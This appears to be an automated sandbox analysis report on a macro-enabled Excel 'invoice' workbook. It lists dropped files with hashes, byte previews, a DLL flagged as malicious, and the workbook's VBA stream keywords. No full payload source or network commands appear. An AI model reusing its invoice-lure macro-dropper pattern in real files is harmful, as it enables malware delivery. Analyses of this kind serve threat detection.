                                                                  SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                  Malicious:false
                                                                  Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                  C:\Users\user\AppData\Local\Temp\WER1CC5.tmp.WERInternalMetadata.xml
                                                                  Process:C:\Windows\System32\DWWIN.EXE
                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):3110
                                                                  Entropy (8bit):3.6802026008202917
                                                                  Encrypted:false
                                                                  SSDEEP:96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp3ZH3:Wl7LBNuhhgG45nv5p
                                                                  MD5:1269CD12A180DB40A0EDDB1DF04E9F01
                                                                  SHA1:1DDFD166A6A4223135C99742BB63E7A2EF93D5FF
                                                                  SHA-256:FEB2AF5FB4B9E72EB40A7748EC8B15181928CB278A4CFE9747645D9F8E3D90CD
                                                                  SHA-512:58BED2B42381F7459BA5EB29A2567EC632AD816D13F042AA97AC1E722B1BEBFB09C52C05D1E660EC7E62D7613A70B163D7494B208F6FDAD31FB45572D2B64DE6
                                                                  Malicious:false
                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.
                                                                  C:\Users\user\AppData\Local\Temp\deibsjhv.dll
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):318976
                                                                  Entropy (8bit):7.117716571043564
                                                                  Encrypted:false
                                                                  SSDEEP:6144:CH9O040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwN:+9O02Srnh0qEJC+Y218jdN
                                                                  MD5:153526D29EC2007BAB82E802476A4DE8
                                                                  SHA1:6AD4255289C294C1FB40D9B016BF9A3910ACD2D7
                                                                  SHA-256:960A1E2B0409907409403684B842DDCCC1BB3369EFAF5881FEA9D1DA51599717
                                                                  SHA-512:87CC56F173494817BC097959D6288880971045DF3BE3C881F62DD72C045EFA55A974FA2A6538518E62487374ABDC060585FC32C53565BE686516DEF39BBADC7E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 33%
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Qf._...........!...2.z...`.......&.......@...............................@..........................................................|....................0..(....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2......p.......2..............@..@.data...H............4..............@....text4...R.......T...P.............. ..@.rsrc...|........0..................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Excel\~ar5F23.xar
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):52921
                                                                  Entropy (8bit):7.83121375225877
                                                                  Encrypted:false
                                                                  SSDEEP:768:7RYYsm84gDXB7UG65JjGUgpq9NxiY+K0/uH8n9QjU205LEd29WNJ4UDTQh4cR:G4Y7UjB4qbF+/28nv5LkJ4UDTQh4cR
                                                                  MD5:B6401224778682FB72465C74F3CAD6EC
                                                                  SHA1:6EC0AA81C2866096603884461A986DC04E9D70B5
                                                                  SHA-256:1AA64193AC4D646A2A7890F2765966DC765180F7099043924544E93328F9446E
                                                                  SHA-512:CD9F6C8883B98C1B330BB554AF2469C4C8BD9F5DCEC6574DBEC583061D35610D41F52397BF466BAA0FE8BBA46AD0A892FAFF733BFEC2ACAE10F2A05BE06965AA
                                                                  Malicious:false
                                                                  Preview: .V...0..W.? ..v....B...J=.].[.W...w.m.^..}.@......%..{o<o<...UR....<].U...FH.......i...).!O......7..... Z.<=.`?R...J..q.0.d.o.Z......j..r....n77P.G........N.O.{Q*O..Jr.0PZiAJ.A.A........I.3.....+.Y. .....,c|..0..b.Qgqe..@......\e...Ad.U....d.(..<..I\.o/0S...0..D...o.{.2..}..rR@r.\..J...6f4.x.\...x.|}F.hK...P/.B\...'...{x.VN.y.......<.@..5....e...+.*.../q.EL..:........=...q....u.D.w.H...].....L...........x.....u.,6.....T.....s.1ai.cw........1n.Hl=.C..O..&EDg......Y1t.O.8....&..a-@.h...`........PK..........!...>,....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Mon Jan 11 23:51:47 2021, atime=Mon Jan 11 23:51:47 2021, length=8192, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):867
                                                                  Entropy (8bit):4.483328508471103
                                                                  Encrypted:false
                                                                  SSDEEP:12:85QpepCLgXg/XAlCPCHaXgzB8IB/0PJX+WnicvblubDtZ3YilMMEpxRljKlcTdJU:85BpU/XTwz6IWRYeYDv3qEwrNru/
                                                                  MD5:FA174A06993AAC0993BCB16D579DAA4C
                                                                  SHA1:94A542664EB3362E5C6B3B8D2882AA3998DBBF56
                                                                  SHA-256:7E3ACFC3D4B7229A8194D15EEFD41A1CDAC1399BC5DA019F30BFD40632473C2B
                                                                  SHA-512:DC172C7E352246945EEEBF582E8C20AAEFC894FE504F2CC141F5511A89BAC401B577379726CC519082990BC23BEDAC65F55F3E9AC9889F1D3415737883F0E449
                                                                  Malicious:false
                                                                  Preview: L..................F...........7G....1.}.....1.}.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....,Rx...Desktop.d......QK.X,Rx.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\226533\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......226533..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INV9698791470-20210111920647.LNK
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Mon Jan 11 23:51:47 2021, atime=Mon Jan 11 23:51:56 2021, length=58673, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2218
                                                                  Entropy (8bit):4.493516785145665
                                                                  Encrypted:false
                                                                  SSDEEP:48:8Bk/XT3IkHUeoLEwQh2Bk/XT3IkHUeoLEwQ/:8Bk/XLIkEXQh2Bk/XLIkEXQ/
                                                                  MD5:3C032ED4207ABCC77992C6F450C90FE1
                                                                  SHA1:14DE153123668A2AD2FB1868673AC0E648B67E5A
                                                                  SHA-256:61D3AE7D3794900E686DD93838B275A8DD12708A70FB702EE6DD82663CB4B648
                                                                  SHA-512:994B24EE0B175B9B8E552B518262B25254F0A60E5F5670B3496F4007D202D8758178EEF86CB071AC916B1F8BE26D1004DF26058D518F7B2FC3E440579BDFA5E3
                                                                  Malicious:false
                                                                  Preview: L..................F.... ....mC..{....1.}...... }...1............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.L...,Rr. .INV969~1.XLS..p.......Q.y.Q.y*...8.....................I.N.V.9.6.9.8.7.9.1.4.7.0.-.2.0.2.1.0.1.1.1.9.2.0.6.4.7...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\226533\Users.user\Desktop\INV9698791470-20210111920647.xlsm.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.V.9.6.9.8.7.9.1.4.7.0.-.2.0.2.1.0.1.1.1.9.2.0.6.4.7...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):139
                                                                  Entropy (8bit):4.456016029908605
                                                                  Encrypted:false
                                                                  SSDEEP:3:oyBVomxWnnRI/dcXVdiul0RI/dcXVdiulmxWnnRI/dcXVdiulv:djUnC2iuL2iu5nC2iu1
                                                                  MD5:50428352EF301BA109C7B0F436800B73
                                                                  SHA1:54DA02692D2DAB5B14156F00211C03C25FCBED30
                                                                  SHA-256:ECCC423CF786F2C92FF9709A6BF5C3011E246729FD442432793A20A8B9035A67
                                                                  SHA-512:D4B8814FCEC9891D32ECC1DD0C8FAAF3F634CE31E9E57526C59ADE47ACAFEC019C6C4DE299E09A3EDB53729DC57F6C2831909D64BBC8D12F7EF0C0F7E84E1057
                                                                  Malicious:false
                                                                  Preview: Desktop.LNK=0..[misc]..INV9698791470-20210111920647.LNK=0..INV9698791470-20210111920647.LNK=0..[misc]..INV9698791470-20210111920647.LNK=0..
                                                                  C:\Users\user\Desktop\94FE0000
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):58673
                                                                  Entropy (8bit):7.858877245262675
                                                                  Encrypted:false
                                                                  SSDEEP:1536:hpnu8RzggbLmCf6646CIKRVUzFg+CIDUPmBZGgGXIjlPsLNFqZ0K:hp1rmCM2xzFg+HDUOPnZ+I0K
                                                                  MD5:541D9D55183F46F2C29A23CC56E8725C
                                                                  SHA1:84BC04B807D053CB18C1A02A4488562FE9B71BDC
                                                                  SHA-256:983C02A70488E1CE72D8D4CAAC9E8DBC9DB5BE0454B38F507FAA9CCFB28D6021
                                                                  SHA-512:96CFD1D233FE0A30D4155830693E4D1DF358D163F3686EB4AA9208BD502848A3CE036DB927812C77C60F28925C1F79CE98133048CFE103E783D6DD902C9BADB3
                                                                  Malicious:false
                                                                  Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\Desktop\~$INV9698791470-20210111920647.xlsm
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):330
                                                                  Entropy (8bit):1.4377382811115937
                                                                  Encrypted:false
                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                  Malicious:true
                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                  Static File Info

                                                                  General

                                                                  File type:Microsoft Excel 2007+
                                                                  Entropy (8bit):7.77272893585129
                                                                  TrID:
                                                                  • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                  • ZIP compressed archive (8000/1) 7.58%
                                                                  File name:INV9698791470-20210111920647.xlsm
                                                                  File size:42039
                                                                  MD5:9b7c2b0abf5478ef9a23d9a9e87c7835
                                                                  SHA1:6931c4b845a8a952699d9cf85b316e3b3d826a41
                                                                  SHA256:a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0
                                                                  SHA512:4c92f1fdbd83eb8e38e93800d2620c328ac59de4d5cdef9e8fbbcfc02fe715f110db49a83880ef0726fb1224d140472abf341b22fa7710710a69f061aa880840
                                                                  SSDEEP:768:IHT0FIYwYlKUOaSqlRgzxTLKLls5QlHbdYoVq+:uYwQKUOVqlRgzxTOLpZYAq+
                                                                  File Content Preview:PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                  File Icon

                                                                  Icon Hash:e4e2aa8aa4bcbcac

                                                                  Static OLE Info

                                                                  General

                                                                  Document Type:OpenXML
                                                                  Number of OLE Files:2

                                                                  OLE File "/opt/package/joesandbox/database/analysis/338095/sample/INV9698791470-20210111920647.xlsm"

                                                                  Indicators

                                                                  Has Summary Info:False
                                                                  Application Name:unknown
                                                                  Encrypted Document:False
                                                                  Contains Word Document Stream:
                                                                  Contains Workbook/Book Stream:
                                                                  Contains PowerPoint Document Stream:
                                                                  Contains Visio Document Stream:
                                                                  Contains ObjectPool Stream:
                                                                  Flash Objects Count:
                                                                  Contains VBA Macros:True

                                                                  Summary

                                                                  Author:
                                                                  Last Saved By:
                                                                  Create Time:2020-12-07T14:38:21Z
                                                                  Last Saved Time:2021-01-11T14:32:26Z
                                                                  Creating Application:Microsoft Excel
                                                                  Security:0

                                                                  Document Summary

                                                                  Thumbnail Scaling Desired:false
                                                                  Company:
                                                                  Contains Dirty Links:false
                                                                  Shared Document:false
                                                                  Changed Hyperlinks:false
                                                                  Application Version:16.0300

                                                                  Streams with VBA

                                                                  VBA File Name: Module1.bas, Stream Size: 3215
                                                                  General
                                                                  Stream Path:VBA/Module1
                                                                  VBA File Name:Module1.bas
                                                                  Stream Size:3215
                                                                  Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                  VBA Code Keywords

                                                                  Keyword
                                                                  Integer:
                                                                  bycilke()
                                                                  VB_Name
                                                                  MiV(sem.value)
                                                                  homepodd()
                                                                  homepodd
                                                                  Error
                                                                  Integer)
                                                                  bycilke
                                                                  Function
                                                                  ol).Name
                                                                  "!"):
                                                                  String
                                                                  "ab":
                                                                  Split(govs,
                                                                  Randomize:
                                                                  yellowsto(yel
                                                                  Next:
                                                                  ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
                                                                  yellowsto(Oa))))
                                                                  Integer
                                                                  yellowsto
                                                                  ol).value
                                                                  nimo(Int((UBound(nimo)
                                                                  Replace(Vo,
                                                                  Chr(sem.Row)
                                                                  Sheets(ol).Cells(homepodd,
                                                                  "ab"))
                                                                  Split(kij(ol),
                                                                  yellowsto(homepodd))
                                                                  Rnd))
                                                                  (Run(""
                                                                  "moreP_"
                                                                  Variant)
                                                                  Attribute
                                                                  Resume
                                                                  pagesREviewsd(Optional
                                                                  ecimovert(nimo
                                                                  ecimovert
                                                                  MsgBox
                                                                  VBA Code
                                                                  VBA File Name: Sheet1.cls, Stream Size: 1639
                                                                  General
                                                                  Stream Path:VBA/Sheet1
                                                                  VBA File Name:Sheet1.cls
                                                                  Stream Size:1639
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
                                                                  Data Raw:01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 fb 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                  VBA Code Keywords

                                                                  Keyword
                                                                  Index
                                                                  VB_Name
                                                                  VB_Creatable
                                                                  Application.OnTime
                                                                  VB_Exposed
                                                                  Long)
                                                                  ResizePagess()
                                                                  VB_Customizable
                                                                  "REviewsd"
                                                                  VB_Control
                                                                  MultiPage"
                                                                  VB_TemplateDerived
                                                                  MSForms,
                                                                  False
                                                                  Attribute
                                                                  Private
                                                                  VB_PredeclaredId
                                                                  VB_GlobalNameSpace
                                                                  VB_Base
                                                                  ResizePagess
                                                                  "pages"
                                                                  VBA Code
                                                                  VBA File Name: ThisWorkbook.cls, Stream Size: 999
                                                                  General
                                                                  Stream Path:VBA/ThisWorkbook
                                                                  VBA File Name:ThisWorkbook.cls
                                                                  Stream Size:999
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                  VBA Code Keywords

                                                                  Keyword
                                                                  False
                                                                  VB_Exposed
                                                                  Attribute
                                                                  VB_Name
                                                                  VB_Creatable
                                                                  "ThisWorkbook"
                                                                  VB_PredeclaredId
                                                                  VB_GlobalNameSpace
                                                                  VB_Base
                                                                  VB_Customizable
                                                                  VB_TemplateDerived
                                                                  VBA Code

                                                                  Streams

                                                                  Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 550
                                                                  General
                                                                  Stream Path:PROJECT
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Stream Size:550
                                                                  Entropy:5.28107922141
                                                                  Base64 Encoded:True
                                                                  Data ASCII:I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 0 - D B B 2 9 D 5 C 1 4 7 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E E E C 1 D 3 1 E 5 F 1 D 7 F 5 D 7 F 5 D 7 F 5 D 7 F 5 " . . D P B = " D C D E 2 F 3 F F 3 2 C F 4 2 C F 4 2 C "
                                                                  Data Raw:49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 30 2d 44 42 42 32 39 44 35 43 31 34 37 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d
                                                                  Stream Path: PROJECTwm, File Type: data, Stream Size: 86
                                                                  General
                                                                  Stream Path:PROJECTwm
                                                                  File Type:data
                                                                  Stream Size:86
                                                                  Entropy:3.24455457963
                                                                  Base64 Encoded:False
                                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                                  Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574
                                                                  General
                                                                  Stream Path:VBA/_VBA_PROJECT
                                                                  File Type:data
                                                                  Stream Size:3574
                                                                  Entropy:4.45079869926
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                  Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                  Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060
                                                                  General
                                                                  Stream Path:VBA/__SRP_0
                                                                  File Type:data
                                                                  Stream Size:2060
                                                                  Entropy:3.45011283232
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . Y . n . M . . . W . . v _ . . . . . . . .
                                                                  Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                  Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187
                                                                  General
                                                                  Stream Path:VBA/__SRP_1
                                                                  File Type:data
                                                                  Stream Size:187
                                                                  Entropy:1.91493173134
                                                                  Base64 Encoded:False
